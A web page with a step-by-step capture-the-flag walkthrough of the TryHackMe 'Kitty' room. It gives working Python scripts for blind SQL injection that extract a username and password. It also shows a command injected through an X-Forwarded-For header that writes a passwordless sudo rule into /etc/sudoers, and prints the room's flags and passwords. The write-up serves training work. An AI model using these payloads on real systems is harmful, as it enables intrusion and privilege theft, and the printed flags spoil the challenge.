CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


08/11/2024 Shad Hussain Knowledge Views 557 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - Kitty - THM

Room Link : https://tryhackme.com/r/room/kitty STEP1 nmap -p- -sSV 10.10.76.67 -Pn -T4 -A FINDING 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) ------------------------------------------------------------------------------------------------------------- STEP2 nano /etc/hosts 10.10.143.247 kitty.thm ctrl+x ctrl+y enter ------------------------------------------------------------------------------------------------------------- STEP2 http://kitty.thm/ http://kitty.thm/register.php register type (asad or 1=1-- -) on login username and submit FINDING SQL Injection detected. This incident will be logged! ------------------------------------------------------------------------------------------------------------- STEP3 use python script to detect database name ********************************************************** import requests probe = +-{}(), abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_ url = http://kitty.thm/index.php headers = { Host: kitty.thm, User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, Accept-Language: en-US,en;q=0.5, Accept-Encoding: gzip, deflate, br, Content-Type: application/x-www-form-urlencoded, Origin: http://kitty.thm, Connection: close, Referer: http://kitty.thm/index.php, Upgrade-Insecure-Requests: 1 } result = while True: for elem in probe: query = " UNION SELECT 1,2,3,4 where database() like {sub}%;-- -".format(sub=result+elem) data = { username: query, password: 123456 } response = requests.post(url, headers=headers, data=data,allow_redirects=True) #print("Size of Response Content:", len(response.content), "bytes") if(len(response.content) == 618): result += elem break if(elem == probe[-1]): print(\033[K) print(result) exit() if(elem != "\n"): print(result+elem,end=\r) ********************************************************** python KittysqlGuessDb.py FINDING mywebsite -- db name ------------------------------------------------------------------------------------------------------------- STEP4 use python script to detect table name ************************************************ import requests probe = +-{}(), abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_ url = http://kitty.thm/index.php headers = { Host: kitty.thm, User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, Accept-Language: en-US,en;q=0.5, Accept-Encoding: gzip, deflate, br, Content-Type: application/x-www-form-urlencoded, Origin: http://kitty.thm, Connection: close, Referer: http://kitty.thm/index.php, Upgrade-Insecure-Requests: 1 } result = while True: for elem in probe: query = " UNION SELECT 1,2,3,4 FROM information_schema.tables WHERE table_schema = mywebsite and table_name like {sub}%;-- -".format(sub=result+elem) data = { username: query, password: 123456 } response = requests.post(url, headers=headers, data=data,allow_redirects=True) #print("Size of Response Content:", len(response.content), "bytes") if(len(response.content) == 618): result += elem break if(elem == probe[-1]): print(\033[K) print(result) exit() if(elem != "\n"): print(result+elem,end=\r) ************************************************ python KittysqlGuessTbl.py FINDING siteusers -- tbl name ------------------------------------------------------------------------------------------------------------- STEP5 use python script to detect user name ************************************************ import requests probe = +-{}(), abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_ url = http://kitty.thm/index.php headers = { Host: kitty.thm, User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, Accept-Language: en-US,en;q=0.5, Accept-Encoding: gzip, deflate, br, Content-Type: application/x-www-form-urlencoded, Origin: http://kitty.thm, Connection: close, Referer: http://kitty.thm/index.php, Upgrade-Insecure-Requests: 1 } result = while True: for elem in probe: query = " UNION SELECT 1,2,3,4 from siteusers where username like {sub}% -- -".format(sub=result+elem) data = { username: query, password: 123456 } response = requests.post(url, headers=headers, data=data,allow_redirects=True) #print("Size of Response Content:", len(response.content), "bytes") if(len(response.content) == 618): result += elem break if(elem == probe[-1]): print(\033[K) print(result) exit() if(elem != "\n"): print(result+elem,end=\r) ************************************************* python KittysqlGuessUsrNm.py FINDING kitty -- user name ------------------------------------------------------------------------------------------------------------- STEP6 use python script to detect password ************************************************ import requests probe = +-{}(), abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_ url = http://kitty.thm/index.php headers = { Host: kitty.thm, User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, Accept-Language: en-US,en;q=0.5, Accept-Encoding: gzip, deflate, br, Content-Type: application/x-www-form-urlencoded, Origin: http://kitty.thm, Connection: close, Referer: http://kitty.thm/index.php, Upgrade-Insecure-Requests: 1 } result = while True: for elem in probe: query = " UNION SELECT 1,2,3,4 from siteusers where username = kitty and password like BINARY {sub}% -- -".format(sub=result+elem) data = { username: query, password: 123456 } response = requests.post(url, headers=headers, data=data,allow_redirects=True) #print("Size of Response Content:", len(response.content), "bytes") if(len(response.content) == 618): result += elem break if(elem == probe[-1]): print(\033[K) print(result) exit() if(elem != "\n"): print(result+elem,end=\r) ************************************************* python KittysqlGuessBinryPasswd.py FINDING L0ng_liv3_KittY -- password ------------------------------------------------------------------------------------------------------------- STEP7 ssh [email protected] -- with password L0ng_liv3_KittY ls -la cat user.txt FINDING What is the user flag? THM{31e606998972c3c6baae67bab463b16a} ------------------------------------------------------------------------------------------------------------- STEP8 cd / ls -la cd opt ls -la cat log_checker.sh FINDING #!/bin/sh while read ip; do /usr/bin/sh -c "echo $ip /root/logged"; done /var/www/development/logged cat /dev/null /var/www/development/logged ------------------------------------------------------------------------------------------------------------- STEP9 cd /var/www/development/ ls -la cat config.php FINDING /* Database credentials. Assuming you are running MySQL server with default setting (user root with no password) */ define(DB_SERVER, localhost); define(DB_USERNAME, kitty); define(DB_PASSWORD, Sup3rAwesOm3Cat!); define(DB_NAME, devsite); ------------------------------------------------------------------------------------------------------------- STEP10 MySQL -u kitty -p Sup3rAwesOm3Cat! NOT USEABLE ------------------------------------------------------------------------------------------------------------- STEP11 apache2ctl -S (we can display the current configuration settings of the Apache HTTP Server. We see an instance running on 127.0.0.1:8080 with a dev_site.conf. This seems to be our candidate.) FINDING 127.0.0.1:8080 localhost (/etc/apache2/sites-enabled/dev_site.conf:2) ------------------------------------------------------------------------------------------------------------- STEP12 curl 127.0.0.1:8080 -d "username=aaa or 1=1-- -&password=aaa" -H "X-Forwarded-For: test" cat logged test FINDING means we can echo any file with this command just instead of "test" we need to write out command ------------------------------------------------------------------------------------------------------------- STEP13 curl 127.0.0.1:8080 -d "username=aaa or 1=1-- -&password=aaa" -H "X-Forwarded-For: \$(echo kitty ALL=(ALL:ALL) NOPASSWD:ALL /etc/sudoers)" sudo -l enter kitty password -- L0ng_liv3_KittY FINDING User kitty may run the following commands on kitty: (ALL : ALL) NOPASSWD: ALL ------------------------------------------------------------------------------------------------------------- STEP14 sudo su root whoami root cd /root ls -la cat root.txt FINDING What is the root flag? THM{581bfc26b53f2e167a05613eecf039bb} -------------------------------------------------------------------------------------------------------------

Related articles

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 





© mutebreak.com | All Rights Reserved